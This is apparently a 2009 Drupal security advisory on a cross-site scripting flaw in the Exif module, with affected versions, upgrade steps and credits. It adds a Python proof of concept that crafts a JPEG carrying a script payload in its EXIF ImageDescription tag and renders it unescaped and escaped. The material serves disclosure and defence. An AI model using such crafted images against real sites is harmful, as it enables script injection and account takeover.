[Security-news] SA-CONTRIB-2009-022 - Exif - Cross Site Scripting

security-news at drupal.org
Wed Apr 29 21:14:50 UTC 2009


  * Advisory ID: DRUPAL-SA-CONTRIB-2009-022
  * Project: Exif (third-party module)
  * Version: 5.x, 6.x
  * Date: 2009-April-29
  * Security risk: Moderately critical
  * Exploitable from: Remote
  * Vulnerability: Cross-site scripting

-------- DESCRIPTION ---------------------------------------------------------

The Exif module lets a site display the EXIF metadata embedded in uploaded
images.

The module outputs EXIF tag values without filtering them for HTML, so a user
with permission to upload images can embed arbitrary HTML or script in the EXIF
tags of a specially crafted image and have it rendered on every page that
displays those tags. Such a cross site scripting [1] (XSS) attack may lead to a
malicious user gaining full administrative access.
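
To make the description concrete, the following is an added example in Python,
not the Exif module's own code: it builds a minimal JPEG whose EXIF
ImageDescription tag carries HTML, reads the tag back the way an EXIF-displaying
page would, and renders the result both unescaped (the vulnerable pattern) and
escaped (the fix; html.escape stands in for Drupal's check_plain()). The
payload, the tag values and the file layout are constructed for this example.

```python
"""Added example (not the Exif module's code): craft an image whose EXIF
ImageDescription tag carries HTML, read the tag back as a gallery page would,
and render it unescaped versus escaped."""
import html
import struct

# EXIF/TIFF tag IDs used below (IFD0, ASCII type 2).
TAG_IMAGE_DESCRIPTION = 0x010E
TAG_ARTIST = 0x013B
TAG_NAMES = {TAG_IMAGE_DESCRIPTION: "ImageDescription", TAG_ARTIST: "Artist"}

# Constructed payload: any HTML the uploader wants reflected into the page.
PAYLOAD = '<script>alert(document.domain)</script>'


def build_exif_jpeg(tags):
    """Return a minimal JPEG (SOI, APP1 'Exif', EOI) whose IFD0 holds the
    given {tag_id: str} as little-endian ASCII entries. It carries no image
    data; it is just enough structure for an EXIF reader (constructed)."""
    n = len(tags)
    data_offset = 8 + 2 + 12 * n + 4          # TIFF header + IFD0 + next-IFD pointer
    entries, blobs = [], []
    for tag_id, value in sorted(tags.items()):  # TIFF wants ascending tag order
        raw = value.encode("utf-8") + b"\x00"    # ASCII values are NUL-terminated
        if len(raw) <= 4:                        # short values live inside the entry
            entries.append(struct.pack("<HHI4s", tag_id, 2, len(raw), raw.ljust(4, b"\x00")))
        else:                                    # longer values are reached by offset
            entries.append(struct.pack("<HHII", tag_id, 2, len(raw), data_offset))
            blobs.append(raw)
            data_offset += len(raw)
    tiff = (b"II" + struct.pack("<HI", 42, 8)
            + struct.pack("<H", n) + b"".join(entries) + struct.pack("<I", 0)
            + b"".join(blobs))
    app1_body = b"Exif\x00\x00" + tiff
    app1 = b"\xff\xe1" + struct.pack(">H", len(app1_body) + 2) + app1_body
    return b"\xff\xd8" + app1 + b"\xff\xd9"


def read_exif_ascii_tags(jpeg):
    """Walk the JPEG segments, find the Exif APP1 segment and return the ASCII
    tags of IFD0 as {tag_id: str}. Tags of other types are skipped."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(jpeg):
        marker, length = struct.unpack(">HH", jpeg[pos:pos + 4])
        if marker == 0xFFD9:
            break
        segment = jpeg[pos + 4:pos + 2 + length]   # length counts itself, not the marker
        pos += 2 + length
        if marker == 0xFFE1 and segment.startswith(b"Exif\x00\x00"):
            return _parse_ifd0(segment[6:])
    return {}


def _parse_ifd0(tiff):
    endian = "<" if tiff[:2] == b"II" else ">"
    magic, ifd = struct.unpack(endian + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF header")
    (n,) = struct.unpack(endian + "H", tiff[ifd:ifd + 2])
    tags = {}
    for i in range(n):
        entry = tiff[ifd + 2 + 12 * i:ifd + 14 + 12 * i]
        tag_id, typ, count = struct.unpack(endian + "HHI", entry[:8])
        if typ != 2:
            continue
        if count <= 4:
            raw = entry[8:8 + count]
        else:
            (off,) = struct.unpack(endian + "I", entry[8:12])
            raw = tiff[off:off + count]
        tags[tag_id] = raw.rstrip(b"\x00").decode("utf-8", "replace")
    return tags


def name_tags(tags):
    """Map tag IDs to readable names, keeping unknown IDs as hex."""
    return {TAG_NAMES.get(t, "0x%04X" % t): v for t, v in tags.items()}


def render_tags_vulnerable(named):
    """The unsafe pattern: values read from the file go straight into markup."""
    return "".join("<tr><td>%s</td><td>%s</td></tr>" % (k, v) for k, v in named.items())


def render_tags_fixed(named):
    """The fix: escape every value read from the file before it reaches the
    page (Drupal 5/6: check_plain(); html.escape is the stand-in here)."""
    return "".join("<tr><td>%s</td><td>%s</td></tr>" % (html.escape(k), html.escape(v))
                   for k, v in named.items())


if __name__ == "__main__":
    img = build_exif_jpeg({TAG_IMAGE_DESCRIPTION: PAYLOAD, TAG_ARTIST: "Alice"})
    named = name_tags(read_exif_ascii_tags(img))
    print("unsafe:", render_tags_vulnerable(named))
    print("fixed: ", render_tags_fixed(named))
```

The same file can be fed to a real EXIF reader (for instance PHP's
exif_read_data()) to check whether a site reflects the ImageDescription value
unescaped; the point of the fix is that escaping happens at output time, so it
covers every tag the module displays rather than only the ones known to be
user-controlled.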

-------- VERSIONS AFFECTED ---------------------------------------------------

  * Exif 5.x-1.x prior to 5.x-1.2
  * Exif 6.x-1.x-dev prior to April 13, 2009

Drupal core is not affected. If you do not use the contributed Exif module,
there is nothing you need to do.

-------- SOLUTION ------------------------------------------------------------

Install the latest version:
  * If you use Exif 5.x-1.x upgrade to Exif 5.x-1.2 [2].
  * Although development versions are not supported, a fix is available: if
    you use Exif 6.x-1.x-dev prior to April 13, 2009, upgrade to the latest
    Exif 6.x-1.x-dev [3].

See also the Exif project page [4].

-------- REPORTED BY ---------------------------------------------------------

Jakub Suchy [5] of the Drupal security team and Michael Hess [6].

-------- FIXED BY ------------------------------------------------------------

James Gilliland [7] and rapsli [8].

-------- CONTACT -------------------------------------------------------------

The security team for Drupal can be reached at security at drupal.org or via
the form at http://drupal.org/contact.

[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/node/448862
[3] http://drupal.org/node/363274
[4] http://drupal.org/project/exif
[5] http://drupal.org/user/31977
[6] http://drupal.org/user/102818
[7] http://drupal.org/user/48673
[8] http://drupal.org/user/140802
